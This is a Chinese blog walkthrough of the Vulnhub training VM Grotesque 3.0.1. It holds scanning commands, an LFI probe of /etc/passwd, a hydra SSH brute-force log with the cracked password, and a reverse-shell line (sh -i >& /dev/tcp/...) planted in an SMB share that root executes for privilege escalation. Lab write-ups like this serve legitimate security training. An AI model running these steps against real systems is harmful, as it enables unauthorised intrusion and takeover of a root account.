看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

2023-09-21 00:52:08

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是Grotesque系列一共有3个靶机,分别是1.2.3老样子需要获得root权限找到flag

Difficulty:medium

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/grotesque/grotesque3.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

在这里插入图片描述
在这里插入图片描述

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :192.168.8.101 靶机IP :192.168.8.178

使用命令:nmap -sS -sV -n -T4 -p- 192.168.8.178

在这里插入图片描述

开启了22,80端口访问80,老样子扫描一下后台使用工具dirb,dirsearch,gobuster都没啥信息

在这里插入图片描述

这里看到一个超链接,点进去一张地图 既然后台扫不出那就换个思路找这个地图的信息 找到了md5

在这里插入图片描述

在这里插入图片描述

②:漏洞发现:

这里提示的是目录是md5加密的,所以需要生成一个加密的md5字典 使用命令:

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done

然后需要把全部的 - 替换为 空格 然后在扫应该就能扫到目录了

在这里插入图片描述

 gobuster dir -u http://192.168.8.178 -w dir.txt -x php,html,txt,png,jpg,jpeg,css,js -b 403,404 -t 35 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.8.178
[+] Method:                  GET
[+] Threads:                 35
[+] Wordlist:                DIRMD5.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,png,jpg,jpeg,css,js,php,html
[+] Timeout:                 10s
===============================================================
2023/08/17 00:22:36 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
Progress: 1978235 / 1985049 (99.66%)
===============================================================
2023/09/20 23:00:00 Finished
===============================================================

扫到了f66b22bf020334b04c7d0d3eb5010391.php进行访问,发现空白页

尝试一下ffuf模糊探测 得到:purpose

 ffuf -c -u http://192.168.8.178/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd -w /usr/share/wordlists/rockyou.txt -fs 0

在这里插入图片描述

③:LFI漏洞利用(本地文件包含漏洞):

这里检测一下 发现有个权限比较高得freddie用户 使用刚刚得md5字典进行爆破SSH密码

hydra -l freddie -P dirmd5.txt ssh://192.168.8.178 -t 20

在这里插入图片描述

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-20 23:22:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 220560 login tries (l:1/p:220560), ~13785 tries per task
[DATA] attacking ssh://192.168.1.49:22/
[STATUS] 142.00 tries/min, 142 tries in 00:01h, 220420 to do in 25:53h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 220266 to do in 37:13h, 14 active
[STATUS] 92.29 tries/min, 646 tries in 00:07h, 219916 to do in 39:43h, 14 active
[STATUS] 2.39 tries/min, 675 tries in 04:42h, 219887 to do in 1535:47h, 14 active
[STATUS] 7.03 tries/min, 2101 tries in 04:58h, 218461 to do in 517:57h, 14 active
[22][ssh] host: 192.168.1.49   login: freddie   password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-20 23:24:23

得到密码为:61a4e3e60c063d1e472dd780f64e6cad

④:SSH登入:
ssh freddie@192.168.8.178

在这里插入图片描述
先拿到个flag

在这里插入图片描述

⑤:提权:

又到了提权阶段了 sudo -lfind / -perm -u=s -type f 2>/dev/null 都没有可以利用的信息。

在这里插入图片描述
ss -tulpn 查看用户开放发那些端口这里发现 开启了445 SMB服务 文件共享

在这里插入图片描述
smbclient -L 127.0.0.1 登入发现了一个grotesque的文件,没有可以利用的信息。

在这里插入图片描述
在这里插入图片描述
这个时候可以上传一个pspy64 看看说不定有什么定时任务呢 🆗 我们继续信息收集一波!

pspy64下载:网上有很多,为了完美这里放个链接方便大家 直接下载

要先把这个pspy64传入靶机 先下载 然后 python3 -m http.server 6789 开启临时网页 wget下载

wget http://192.168.8.101:6789/pspy64s #下载
chmod 777  pspy64s  #赋予权限

在这里插入图片描述
在这里插入图片描述
发现 root用户在用bash这个命令去执行smbshare文件夹下面的sh文件
既然这样那我们是不是可以尝试写一个反弹shell 放到smb下面 过一会就会执行命令!

#!/bin/bash
sh -i >& /dev/tcp/192.168.8.101/1111 0>&1  # 记住是本机ip哈 别搞错了不然弹不上

在这里插入图片描述
再次登入 smbclient //127.0.0.1/grotesque 然后使用putshell.sh 传上去 需要等一下才会回弹

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
PS:又是一篇肝到凌晨的文章,希望以后回来看看都是回忆

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集 dirb,dirsearch,gobuster后台扫描工具(老生常谈 了)
2.for 生成MD5字典 (新知识点)
3.ffuf模糊探测,hydra爆破工具的使用,LFI漏洞利用
4.提权得信息收集,pspy64的使用,反弹sh的脚本编写 以及文件的上传下载 wgetput

Grotesque系列的最后一个靶机这个系列又完结啦,学习到了很多知识点又是收获满满的一天
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

更多推荐

利用LSTM和TensorFlow模拟任意艺术家风格生成新歌词:完整Python实现指南

1.介绍随着深度学习技术的快速进步,我们现在可以使用各种神经网络结构来生成文本、图像甚至音乐。其中,长短期记忆网络(LSTM)是处理序列数据,如文本和时间序列数据的首选技术。在这篇文章中,我们将探讨如何使用LSTM和TensorFlow库来模拟任意艺术家的风格生成新歌词。2.LSTM网络简介长短期记忆网络(LSTM)是

LuatOS-SOC接口文档(air780E)--eink - 墨水屏操作库

常量常量类型解释eink.MODEL_1in02dnumber1.02寸deink.MODEL_1in54number1.54寸eink.MODEL_1in54_V2number1.54寸_V2eink.MODEL_1in54bnumber1.54寸beink.MODEL_1in54b_V2number1.54寸b_V

Node.js 20 —— 几个令人大开眼界的特性

前言:欢迎来到Node.js20Node.js20已经发布,带来了创新和激动人心的新时代。这个开创性的版本于2023年4月18日首次亮相,并将在2023年10月发布长期支持(LTS)版本,并且将持续支持至2026年4月,下面小编就为大家介绍一下Node.js20的几个新特性:1.Node.js权限访问Node.js20

JS案例:在浏览器实现自定义菜单

目录前言设计思路BaseElemMenuCustomElementBaseDragDragResize最终效果总结相关代码前言分享一下之前公司实现自定义菜单的思路,禁用浏览器右键菜单,使用自定义的菜单将其代替,主要功能有:鼠标右键调出菜单,双击选中/取消选中标签,新建标签,删除标签,调整位置,调整大小,取消拖拽,关闭菜

详解JS中常见的5 种 for 循环

for循环在平时开发中使用频率最高的,前后端数据交互时,常见的数据类型就是数组和对象,处理对象和数组时经常使用到for遍历,因此需要彻底搞懂这5种for循环。它们分别为:forfor...infor...offorawait..offorEachmap一、各个for介绍1、forfor循环是出现最早,也是应用最普遍的一

联表查询 && 索引 && 事务 && JDBC使用 &&CPU工作原理 && 线程概念 && Thread类的用法

第1题(单选题)题目名称:已知表T1中有2行数据,T2中有3行数据,执行SQL语句,“selecta.*fromT1a,T2b”后,返回的行数为题目内容:A.2B.3C.5D.6第2题(单选题)题目名称:Mysql查询时,只有满足联接条件的记录才包含在查询结果,这种联接是题目内容:A.左联接B.右联接C.内联接D.全联

Vue.js和TypeScript:如何完美结合

🌷🍁博主猫头虎(🐅🐾)带您GotoNewWorld✨🍁🦄博客首页——🐅🐾猫头虎的博客🎐🐳《面试题大全专栏》🦕文章图文并茂🦖生动形象🐅简单易学!欢迎大家来踩踩~🌺🌊《IDEA开发秘籍专栏》🐾学会IDEA常用操作,工作效率翻倍~💐🌊《100天精通Golang(基础入门篇)》🐅学会Gol

Redis SCAN命令操作实战(详细)

目录SCAN介绍SCAN命令基本用法MATCH选项用法COUNT选项用法TYPE选项用法补充并发执行多个迭代中途停止迭代使用错误的游标进行增量式迭代迭代终结的保证SCAN介绍SCANcursor[MATCHpattern][COUNTcount][TYPEtype]:SCAN命令及其相关的SSCAN命令、HSCAN命令

抽象轻松的C语言

四个基本元素标识符,数据,运算符,关键字标识符:是指计算机用来识别信息的符号数据:是事物或观察的结果运算符,关键字:具体内容具体分析由四个基本元素组合成6个基本语句标号语句,复合语句,表达式语句,选择语句,迭代语句,跳转语句PS:之前的那个标识语句呢?在最近的疯狂啃食之下,出现了点问题,于是我回过头重看不看不知道,一看

接口自动化中cookies的处理技术

一,理论知识为什么有cookie和session?因为http协议是一种无状态的协议,即每次服务端接受到客户端的请求时都时一个全新的请求,服务器并不知道客户端的请求记录,session和cookie主要目的就是弥补http的无状态特性cookiecookie是服务器发送到用户浏览器并保存到用户本地的一小块数据,会在浏览

C语言进阶第三课-----------指针的进阶----------后续版

作者前言🎂✨✨✨✨✨✨🍧🍧🍧🍧🍧🍧🍧🎂​🎂作者介绍:🎂🎂🎂🎉🎉🎉🎉🎉🎉🎉🎂🎂作者id:老秦包你会,🎂简单介绍:🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂🎂喜欢学习C语言和python等编程语言,是一位爱分享的博主,有兴趣的小可爱可以来互讨🎂🎂🎂🎂🎂

热文推荐